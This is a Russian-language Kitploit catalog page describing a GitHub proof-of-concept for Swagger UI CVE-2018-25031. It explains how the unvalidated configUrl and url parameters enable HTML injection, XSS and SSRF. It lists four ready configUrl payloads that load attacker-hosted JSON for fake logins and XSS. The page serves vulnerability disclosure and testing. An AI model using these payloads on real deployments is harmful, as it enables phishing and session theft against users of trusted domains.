Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
swagger-ui — Swagger UI (CVE-2018-25031) POC, [HTMLi, XSS]. | Kitploit
Инструменты/GitHubGitHub/relichunt3r/swagger-ui
Инструменты фишингаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubrelichunt3r/swagger-ui

swagger-ui

Swagger UI (CVE-2018-25031) POC, [HTMLi, XSS].

Репозиторий
9 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Введение: Роль Swagger UI

Swagger UI — это широко используемая библиотека, которая преобразует спецификации OpenAPI (ранее Swagger) в интерактивный веб-интерфейс. Она позволяет разработчикам и интеграторам исследовать и тестировать API без наличия бэкенд-реализации.

Подробности CVE‑2018‑25031

Основная причина: удаленная загрузка спецификаций

Уязвимость возникает из-за недостаточной проверки параметров URL-запроса, используемых для загрузки удаленных конфигурационных файлов или спецификаций клиентом Swagger UI. Обычно используются следующие параметры:

  • ?url=.yaml
  • ?configUrl=.json

Злоумышленник может указать эти параметры на подконтрольный ему файл спецификации или конфигурации OpenAPI, размещенный удаленно, который может быть отрендерен уязвимым экземпляром.

Потенциальные векторы атак

Загрузка вредоносного удаленного файла может привести к нескольким серьезным последствиям в зависимости от конфигурации хостинга и используемых средств защиты:

  1. Внедрение HTML (HTMLi) / Фишинг — внедренные файлы могут содержать произвольный HTML, визуально подделывающий содержимое (например, поддельные формы входа), злоупотребляя доверенным доменом самостоятельного хостинга.
  2. Межсайтовый скриптинг (XSS) — если внедренный контент включает исполняемый JavaScript, это может привести к DOM XSS и позволить кражу сессий или выполнение действий от имени пользователей.
  3. Подделка запросов на стороне сервера (SSRF) — когда серверы загружают удаленные спецификации от имени клиента, злоумышленник может заставить сервер выполнять запросы к внутренним конечным точкам, потенциально раскрывая конфиденциальные ресурсы.

Ссылки:

  • https://nvd.nist.gov/vuln/detail/CVE-2018-25031
  • https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers

PoC (Proof‑of‑Concept)

Полезные нагрузки

1 - Вход

?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/login.json

2 - Удаленный вход

?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/remote-login.json

3 - Изображение

?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/img.json

4 - XSS

?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/xss.json

📌 Отказ от ответственности

Содержимое этого репозитория предоставлено только в образовательных и информационных целях. Автор не несет ответственности за любое неправомерное использование. Убедитесь, что у вас есть соответствующие разрешения перед использованием, действуйте ответственно на свой страх и риск, а также соблюдайте все юридические и этические нормы.

Скачать инструмент